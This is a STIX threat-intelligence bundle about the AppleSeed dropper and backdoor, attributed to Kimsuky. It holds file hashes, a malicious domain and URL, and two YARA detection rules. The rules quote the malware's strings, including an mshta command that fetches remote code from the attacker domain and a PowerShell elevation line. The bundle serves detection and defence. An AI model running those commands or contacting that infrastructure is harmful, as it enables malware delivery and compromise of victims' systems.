{
    "type": "bundle",
    "id": "bundle--63839e36-ec4f-48cd-99b6-5b2f9cdfe94c",
    "objects": [
        {
            "type": "identity",
            "spec_version": "2.1",
            "id": "identity--aa1f6b1b-a647-4d2a-9517-9110ff9b0275",
            "created": "2026-04-05T23:39:49.189369Z",
            "modified": "2026-04-05T23:48:56.132858Z",
            "name": "CyberAndRamen",
            "identity_class": "organization"
        },
        {
            "type": "file",
            "spec_version": "2.1",
            "id": "file--e43473c0-3e2d-4223-a723-5cfa6e7f1127",
            "hashes": {
                "MD5": "851e33373114fef45d0fe28c6934fa73"
            }
        },
        {
            "type": "domain-name",
            "spec_version": "2.1",
            "id": "domain-name--7f066a0f-11f2-46f4-acbc-b2c4ccd5011b",
            "value": "leomin.dothome.co.kr"
        },
        {
            "type": "indicator",
            "spec_version": "2.1",
            "id": "indicator--204c8814-6686-4fe5-bfc1-da50042c87ea",
            "created": "2026-06-24T18:11:30.910063Z",
            "modified": "2026-06-24T18:11:30.910063Z",
            "name": "YARA Rule",
            "pattern": "rule NK_APT_AppleSeed_Backdoor {\r\nmeta:\r\ndescription = \u201d \u2013 file AutoUpdate.dll\u201d\r\nauthor = \u201cMichael Rippey\u201d\r\nreference = \u201chttps://asec.ahnlab.com/ko/34883/\u201d\r\ndate = \u201c2022-06-01\u201d\r\nhash = \u201ce240465ca0c31373dc7f1af2bfc08bda45a45aaf4466c6a15d3f16f1182147ea\u201d\r\nstrings:\r\n$a1 = \u201cADVAPI32.dll\u201d fullword ascii\r\n$a2 = \u201cKERNEL32.DLL\u201d fullword ascii\r\n$a3 = \u201cfreed.dll\u201d fullword ascii\r\n$a4 = \u201coutlook\u201d fullword wide\r\n$a5 = \u201cCryptEncrypt\u201d fullword ascii\r\n$a6 = \u201camily not supporte\u201d fullword ascii\r\n$a7 = \u201cconnecyar\u201d fullword ascii\r\n$a8 = \u201crerictaj\u201d fullword ascii\r\n$a9 = \u201clrgeabik\u201d fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize < 400KB and\r\n5 of them\r\n}",
            "pattern_type": "yara",
            "valid_from": "2022-06-05T00:00:00Z"
        },
        {
            "type": "indicator",
            "spec_version": "2.1",
            "id": "indicator--acea2774-e3d2-4056-b8e9-8a710dbf35b1",
            "created": "2026-06-24T18:11:30.910802Z",
            "modified": "2026-06-24T18:11:30.910802Z",
            "name": "YARA Rule",
            "pattern": "rule NK_APT_AppleSeed_Dropper {\r\nmeta:\r\ndescription = \u201d \u2013 file firmware upgrade installer.exe\u201d\r\nauthor = \u201cMichael Rippey\u201d\r\nreference = \u201chttps://asec.ahnlab.com/ko/34883/\u201d\r\ndate = \u201c2022-06-01\u201d\r\nhash = \u201ce0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f\u201d\r\nstrings:\r\n$a = \u201cpowershell.exe start-process \\\u201d%s\\\u201d -argumentlist \u2018%s\u2019 -verb runas\u201d fullword wide\r\n$b1 = \u201cmshta.exe http://leomin.dothome.co.kr/update/?mode=login\u201d fullword ascii\r\n$b2 = \u201cUSER32.dll\u201d fullword ascii\r\n$b3 = \u201cKERNEL32.dll\u201d fullword ascii\r\n$b4 = \u201ckernel32.dll\u201d fullword wide\r\n$b5 = \u201cmscoree.dll\u201d fullword wide\r\n$b6 = \u201chttps://iptime.com\u201d fullword wide\r\n$b7 = \u201cbroken pipe\u201d fullword ascii\r\n$b8 = \u201cexecutable format error\u201d fullword ascii\r\n$b9 = \u201chost unreachable\u201d fullword ascii\r\n$b10 = \u201cconnection already in progress\u201d fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize < 1000KB and\r\n1 of ($a*) and 4 of them\r\n}",
            "pattern_type": "yara",
            "valid_from": "2022-06-05T00:00:00Z"
        },
        {
            "type": "file",
            "spec_version": "2.1",
            "id": "file--a0f25428-273a-4082-b914-e0571990363a",
            "hashes": {
                "SHA-256": "e240465ca0c31373dc7f1af2bfc08bda45a45aaf4466c6a15d3f16f1182147ea"
            }
        },
        {
            "type": "file",
            "spec_version": "2.1",
            "id": "file--1b829bfd-f9c2-499e-b295-de27733cbcfa",
            "hashes": {
                "SHA-256": "e0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f"
            }
        },
        {
            "type": "url",
            "spec_version": "2.1",
            "id": "url--acc9bf9e-54dc-44be-a9f6-3b775306b8e3",
            "value": "http://leomin.dothome.co.kr/update/?mode=login"
        },
        {
            "type": "threat-actor",
            "spec_version": "2.1",
            "id": "threat-actor--3cad7692-b5b4-565b-88b1-63998b3f44a1",
            "created": "2026-06-24T18:11:30.915832Z",
            "modified": "2026-06-24T18:11:30.915832Z",
            "name": "Kimsuky"
        },
        {
            "type": "report",
            "spec_version": "2.1",
            "id": "report--b450c638-9961-4a82-8032-8dbdd5188804",
            "created_by_ref": "identity--aa1f6b1b-a647-4d2a-9517-9110ff9b0275",
            "created": "2026-06-24T18:11:30.926428Z",
            "modified": "2026-06-24T18:11:30.926428Z",
            "name": "Overview of AppleSeed Dropper",
            "published": "2022-06-05T00:00:00Z",
            "object_refs": [
                "identity--aa1f6b1b-a647-4d2a-9517-9110ff9b0275",
                "file--e43473c0-3e2d-4223-a723-5cfa6e7f1127",
                "domain-name--7f066a0f-11f2-46f4-acbc-b2c4ccd5011b",
                "indicator--204c8814-6686-4fe5-bfc1-da50042c87ea",
                "indicator--acea2774-e3d2-4056-b8e9-8a710dbf35b1",
                "file--a0f25428-273a-4082-b914-e0571990363a",
                "file--1b829bfd-f9c2-499e-b295-de27733cbcfa",
                "url--acc9bf9e-54dc-44be-a9f6-3b775306b8e3",
                "threat-actor--3cad7692-b5b4-565b-88b1-63998b3f44a1"
            ],
            "external_references": [
                {
                    "source_name": "source",
                    "url": "https://cyberandramen.net/2022/06/05/overview-of-appleseed-dropper/"
                }
            ]
        }
    ]
}